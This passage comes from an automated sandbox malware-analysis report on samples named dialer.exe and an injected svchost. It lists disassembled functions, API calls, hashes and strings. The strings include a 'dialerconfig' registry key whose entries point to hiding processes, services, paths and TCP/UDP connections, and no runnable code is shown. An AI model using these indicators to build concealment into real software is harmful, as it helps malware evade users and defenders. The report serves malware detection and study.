                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 5ef3a62ee765a1df1a1f27c3b1b84fcb72e3878a555015f6c2828a79b2353043
                                                        • Instruction ID: 6ceb1774513a96d490965431a2b85a641fdade9f6b2d570d4bac0a3159b1485b
                                                        • Opcode Fuzzy Hash: 5ef3a62ee765a1df1a1f27c3b1b84fcb72e3878a555015f6c2828a79b2353043
                                                        • Instruction Fuzzy Hash: 22214CB1B0150582FA77DA2BF5903F91192ABCC7E4F258535FF59473F5DE3888828241
                                                        Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 660 140001880-14000189c 661 1400018a2-1400018f9 call 140002420 call 140002660 660->661 662 140001a0f-140001a1f 660->662 661->662 667 1400018ff-140001910 661->667 668 140001912-14000191c 667->668 669 14000193e-140001941 667->669 670 14000194d-140001954 668->670 671 14000191e-140001929 668->671 669->670 672 140001943-140001947 669->672 675 140001956-140001961 670->675 676 14000199e-1400019a6 670->676 671->670 673 14000192b-14000193a 671->673 672->670 674 140001a20-140001a26 672->674 673->669 677 140001b87-140001b98 call 140001d40 674->677 678 140001a2c-140001a37 674->678 679 140001970-14000199c call 140001ba0 675->679 676->662 680 1400019a8-1400019c1 676->680 678->676 681 140001a3d-140001a5f 678->681 679->676 684 1400019df-1400019e7 680->684 687 140001a7d-140001a97 681->687 685 1400019e9-140001a0d VirtualProtect 684->685 686 1400019d0-1400019dd 684->686 685->686 686->662 686->684 690 140001b74-140001b82 call 140001d40 687->690 691 140001a9d-140001afa 687->691 690->677 697 140001b22-140001b26 691->697 698 140001afc-140001b0e 691->698 701 140001b2c-140001b30 697->701 702 140001a70-140001a77 697->702 699 140001b5c-140001b6c 698->699 700 140001b10-140001b20 698->700 699->690 704 140001b6f call 140001d40 699->704 700->697 700->699 701->702 703 140001b36-140001b57 call 140001ba0 701->703 702->676 702->687 703->699 704->690
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                        • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                                        • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                        • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                        Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 708 140001800-140001810 709 140001812-140001822 708->709 710 140001824 708->710 711 14000182b-140001867 call 140002290 fprintf 709->711 710->711
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: b42aeac11d05b8ea25802da21c5bcc675e4d545df447c9ba059f3bdc1807f998
                                                        • Instruction ID: d95ce6b0039aa860daeef9cca60753270dd6df5ba42e2edc4f3d8be758d16bb5
                                                        • Opcode Fuzzy Hash: b42aeac11d05b8ea25802da21c5bcc675e4d545df447c9ba059f3bdc1807f998
                                                        • Instruction Fuzzy Hash: DFF09671A14A4482E612EF6AB9417ED6361E75D7C1F50D211FF4DA76A1DF3CD182C310
                                                        Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 714 14000219e-1400021a5 715 140002272-140002280 714->715 716 1400021ab-1400021c2 EnterCriticalSection 714->716 717 140002265-14000226c LeaveCriticalSection 716->717 718 1400021c8-1400021d6 716->718 717->715 719 1400021e9-1400021f5 TlsGetValue GetLastError 718->719 720 1400021f7-1400021fa 719->720 721 1400021e0-1400021e7 719->721 720->721 722 1400021fc-140002209 720->722 721->717 721->719 722->721
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                        • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                                        • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                        • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300

                                                        Execution Graph

                                                        Execution Coverage:56.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:87.5%
                                                        Total number of Nodes:8
                                                        Total number of Limit Nodes:1

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                        Executed Functions

                                                        Function 00000001408460F0 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000042.00000002.2793385319.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000042.00000002.2793218527.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000042.00000002.2793385319.00000001404DC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000042.00000002.2793385319.0000000140500000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000042.00000002.2793385319.0000000140503000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000042.00000002.2793385319.000000014078B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000042.00000002.2793385319.000000014080D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000042.00000002.2797364580.0000000140847000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_66_2_140000000_dialer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                        • String ID:
                                                        • API String ID: 1941872368-0
                                                        • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                        • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                        • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                        • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:66
                                                        Total number of Limit Nodes:2
                                                        execution_graph 14720 1fb5399273c 14722 1fb5399276a 14720->14722 14721 1fb53992858 LoadLibraryA 14721->14722 14722->14721 14723 1fb539928d4 14722->14723 14724 1fb539c1abc 14729 1fb539c1628 GetProcessHeap HeapAlloc 14724->14729 14726 1fb539c1ad2 Sleep SleepEx 14727 1fb539c1acb 14726->14727 14727->14726 14728 1fb539c1598 StrCmpIW StrCmpW 14727->14728 14728->14727 14773 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14729->14773 14731 1fb539c1650 14774 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14731->14774 14733 1fb539c1661 14775 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14733->14775 14735 1fb539c166a 14776 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14735->14776 14737 1fb539c1673 14738 1fb539c168e RegOpenKeyExW 14737->14738 14739 1fb539c18a6 14738->14739 14740 1fb539c16c0 RegOpenKeyExW 14738->14740 14739->14727 14741 1fb539c16e9 14740->14741 14742 1fb539c16ff RegOpenKeyExW 14740->14742 14777 1fb539c12bc RegQueryInfoKeyW 14741->14777 14744 1fb539c173a RegOpenKeyExW 14742->14744 14745 1fb539c1723 14742->14745 14747 1fb539c1775 RegOpenKeyExW 14744->14747 14748 1fb539c175e 14744->14748 14786 1fb539c104c RegQueryInfoKeyW 14745->14786 14752 1fb539c1799 14747->14752 14753 1fb539c17b0 RegOpenKeyExW 14747->14753 14751 1fb539c12bc 16 API calls 14748->14751 14754 1fb539c176b RegCloseKey 14751->14754 14755 1fb539c12bc 16 API calls 14752->14755 14756 1fb539c17d4 14753->14756 14757 1fb539c17eb RegOpenKeyExW 14753->14757 14754->14747 14758 1fb539c17a6 RegCloseKey 14755->14758 14759 1fb539c12bc 16 API calls 14756->14759 14760 1fb539c1826 RegOpenKeyExW 14757->14760 14761 1fb539c180f 14757->14761 14758->14753 14765 1fb539c17e1 RegCloseKey 14759->14765 14763 1fb539c184a 14760->14763 14764 1fb539c1861 RegOpenKeyExW 14760->14764 14762 1fb539c104c 6 API calls 14761->14762 14766 1fb539c181c RegCloseKey 14762->14766 14767 1fb539c104c 6 API calls 14763->14767 14768 1fb539c1885 14764->14768 14769 1fb539c189c RegCloseKey 14764->14769 14765->14757 14766->14760 14770 1fb539c1857 RegCloseKey 14767->14770 14771 1fb539c104c 6 API calls 14768->14771 14769->14739 14770->14764 14772 1fb539c1892 RegCloseKey 14771->14772 14772->14769 14773->14731 14774->14733 14775->14735 14776->14737 14778 1fb539c1327 GetProcessHeap HeapAlloc 14777->14778 14779 1fb539c148a RegCloseKey 14777->14779 14780 1fb539c1476 GetProcessHeap HeapFree 14778->14780 14781 1fb539c1352 RegEnumValueW 14778->14781 14779->14742 14780->14779 14782 1fb539c13a5 14781->14782 14782->14780 14782->14781 14784 1fb539c13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14782->14784 14785 1fb539c141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14782->14785 14791 1fb539c152c 14782->14791 14784->14785 14785->14782 14787 1fb539c11b5 RegCloseKey 14786->14787 14789 1fb539c10bf 14786->14789 14787->14744 14788 1fb539c10cf RegEnumValueW 14788->14789 14789->14787 14789->14788 14790 1fb539c114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14789->14790 14790->14789 14792 1fb539c1546 14791->14792 14795 1fb539c157c 14791->14795 14793 1fb539c1565 StrCmpW 14792->14793 14794 1fb539c155d StrCmpIW 14792->14794 14792->14795 14793->14792 14794->14792 14795->14782

                                                        Executed Functions

                                                        Function 000001FB539C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 3bf4cfb0a07fb8a34a3f598bc96345aa7c46004167599278be6342a6ae7bd595
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 4E7138B631AA5686FB109F66E8C16E923A6FB84B88F485521DE4F47B78DF3CC444C344
                                                        Function 000001FB539C328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 18ea53aa43a98f725242ccc54522eb2a995cd4f0bc6055a6e4289cc5d1fcdbce
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: E111A1F161E24B82F760ABA1F8C53F96397A788344F9C41349A4B817B6EF7DC044C600
                                                        Function 000001FB539C1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001FB539C1628: GetProcessHeap.KERNEL32 ref: 000001FB539C1633
                                                          • Part of subcall function 000001FB539C1628: HeapAlloc.KERNEL32 ref: 000001FB539C1642
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C16B2
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C16DF
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C16F9
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1719
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1734
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1754
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C176F
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C178F
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C17AA
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C17CA
                                                        • Sleep.KERNEL32 ref: 000001FB539C1AD7
                                                        • SleepEx.KERNELBASE ref: 000001FB539C1ADD
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C17E5
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1805
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1820
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1840
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C185B
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C187B
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1896
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C18A0
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 7138facc15c73e94db0cfb52103dedfc80ca7baf7500d53e4cc01c5e64d1c001
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 4C3180F520A64B51FF50AB26DAD13F953A6AB48BD0F0C54319E0B877BAEF2CC451C618
                                                        Function 000001FB5399273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 108 1fb5399273c-1fb539927a4 call 1fb539929d4 * 4 117 1fb539927aa-1fb539927ad 108->117 118 1fb539929b2 108->118 117->118 119 1fb539927b3-1fb539927b6 117->119 120 1fb539929b4-1fb539929d0 118->120 119->118 121 1fb539927bc-1fb539927bf 119->121 121->118 122 1fb539927c5-1fb539927e6 121->122 122->118 124 1fb539927ec-1fb5399280c 122->124 125 1fb53992838-1fb5399283f 124->125 126 1fb5399280e-1fb53992836 124->126 127 1fb53992845-1fb53992852 125->127 128 1fb539928df-1fb539928e6 125->128 126->125 126->126 127->128 131 1fb53992858-1fb5399286a LoadLibraryA 127->131 129 1fb539928ec-1fb53992901 128->129 130 1fb53992992-1fb539929b0 128->130 129->130 132 1fb53992907 129->132 130->120 133 1fb539928ca-1fb539928d2 131->133 134 1fb5399286c-1fb53992878 131->134 137 1fb5399290d-1fb53992921 132->137 133->131 135 1fb539928d4-1fb539928d9 133->135 138 1fb539928c5-1fb539928c8 134->138 135->128 140 1fb53992923-1fb53992934 137->140 141 1fb53992982-1fb5399298c 137->141 138->133 139 1fb5399287a-1fb5399287d 138->139 145 1fb539928a7-1fb539928b7 139->145 146 1fb5399287f-1fb539928a5 139->146 143 1fb53992936-1fb5399293d 140->143 144 1fb5399293f-1fb53992943 140->144 141->130 141->137 147 1fb53992970-1fb53992980 143->147 148 1fb53992945-1fb5399294b 144->148 149 1fb5399294d-1fb53992951 144->149 150 1fb539928ba-1fb539928c1 145->150 146->150 147->140 147->141 148->147 151 1fb53992963-1fb53992967 149->151 152 1fb53992953-1fb53992961 149->152 150->138 151->147 154 1fb53992969-1fb5399296c 151->154 152->147 154->147
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 61dd91bc6a25e48f392e8f6ba260480b8200c95b887252fc9720a6961359b089
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: A661F1B3B0A69987DB548F15D1A07B9B39AF754BA4F1C8131DE9A03798DB38DC52CB00

                                                        Non-executed Functions

                                                        Function 000001FB539C2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 351 1fb539c2b2c-1fb539c2ba5 call 1fb539e2ce0 354 1fb539c2ee0-1fb539c2f03 351->354 355 1fb539c2bab-1fb539c2bb1 351->355 355->354 356 1fb539c2bb7-1fb539c2bba 355->356 356->354 357 1fb539c2bc0-1fb539c2bc3 356->357 357->354 358 1fb539c2bc9-1fb539c2bd9 GetModuleHandleA 357->358 359 1fb539c2bdb-1fb539c2beb GetProcAddress 358->359 360 1fb539c2bed 358->360 361 1fb539c2bf0-1fb539c2c0e 359->361 360->361 361->354 363 1fb539c2c14-1fb539c2c33 StrCmpNIW 361->363 363->354 364 1fb539c2c39-1fb539c2c3d 363->364 364->354 365 1fb539c2c43-1fb539c2c4d 364->365 365->354 366 1fb539c2c53-1fb539c2c5a 365->366 366->354 367 1fb539c2c60-1fb539c2c73 366->367 368 1fb539c2c83 367->368 369 1fb539c2c75-1fb539c2c81 367->369 370 1fb539c2c86-1fb539c2c8a 368->370 369->370 371 1fb539c2c9a 370->371 372 1fb539c2c8c-1fb539c2c98 370->372 373 1fb539c2c9d-1fb539c2ca7 371->373 372->373 374 1fb539c2d9d-1fb539c2da1 373->374 375 1fb539c2cad-1fb539c2cb0 373->375 376 1fb539c2da7-1fb539c2daa 374->376 377 1fb539c2ed2-1fb539c2eda 374->377 378 1fb539c2cc2-1fb539c2ccc 375->378 379 1fb539c2cb2-1fb539c2cbf call 1fb539c199c 375->379 380 1fb539c2dbb-1fb539c2dc5 376->380 381 1fb539c2dac-1fb539c2db8 call 1fb539c199c 376->381 377->354 377->367 383 1fb539c2d00-1fb539c2d0a 378->383 384 1fb539c2cce-1fb539c2cdb 378->384 379->378 388 1fb539c2dc7-1fb539c2dd4 380->388 389 1fb539c2df5-1fb539c2df8 380->389 381->380 385 1fb539c2d3a-1fb539c2d3d 383->385 386 1fb539c2d0c-1fb539c2d19 383->386 384->383 391 1fb539c2cdd-1fb539c2cea 384->391 393 1fb539c2d3f-1fb539c2d49 call 1fb539c1bbc 385->393 394 1fb539c2d4b-1fb539c2d58 lstrlenW 385->394 386->385 392 1fb539c2d1b-1fb539c2d28 386->392 388->389 396 1fb539c2dd6-1fb539c2de3 388->396 397 1fb539c2dfa-1fb539c2e03 call 1fb539c1bbc 389->397 398 1fb539c2e05-1fb539c2e12 lstrlenW 389->398 399 1fb539c2ced-1fb539c2cf3 391->399 402 1fb539c2d2b-1fb539c2d31 392->402 393->394 409 1fb539c2d93-1fb539c2d98 393->409 404 1fb539c2d5a-1fb539c2d64 394->404 405 1fb539c2d7b-1fb539c2d8d call 1fb539c3844 394->405 406 1fb539c2de6-1fb539c2dec 396->406 397->398 416 1fb539c2e4a-1fb539c2e55 397->416 400 1fb539c2e14-1fb539c2e1e 398->400 401 1fb539c2e35-1fb539c2e3f call 1fb539c3844 398->401 408 1fb539c2cf9-1fb539c2cfe 399->408 399->409 400->401 410 1fb539c2e20-1fb539c2e33 call 1fb539c152c 400->410 411 1fb539c2e42-1fb539c2e44 401->411 402->409 412 1fb539c2d33-1fb539c2d38 402->412 404->405 415 1fb539c2d66-1fb539c2d79 call 1fb539c152c 404->415 405->409 405->411 406->416 417 1fb539c2dee-1fb539c2df3 406->417 408->383 408->399 409->411 410->401 410->416 411->377 411->416 412->385 412->402 415->405 415->409 422 1fb539c2e57-1fb539c2e5b 416->422 423 1fb539c2ecc-1fb539c2ed0 416->423 417->389 417->406 427 1fb539c2e63-1fb539c2e7d call 1fb539c85c0 422->427 428 1fb539c2e5d-1fb539c2e61 422->428 423->377 430 1fb539c2e80-1fb539c2e83 427->430 428->427 428->430 433 1fb539c2e85-1fb539c2ea3 call 1fb539c85c0 430->433 434 1fb539c2ea6-1fb539c2ea9 430->434 433->434 434->423 436 1fb539c2eab-1fb539c2ec9 call 1fb539c85c0 434->436 436->423
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 3ce0a275c11acc5e92f3c7ae4efb9db0a1a550ce48a5a8c3fee84c71d8458c05
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: F1B191B221A69A82EF549F25D4907F9A3A6F748B84F4C5036DE8B677A4DF39CC40C340
                                                        Function 000001FB539C7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
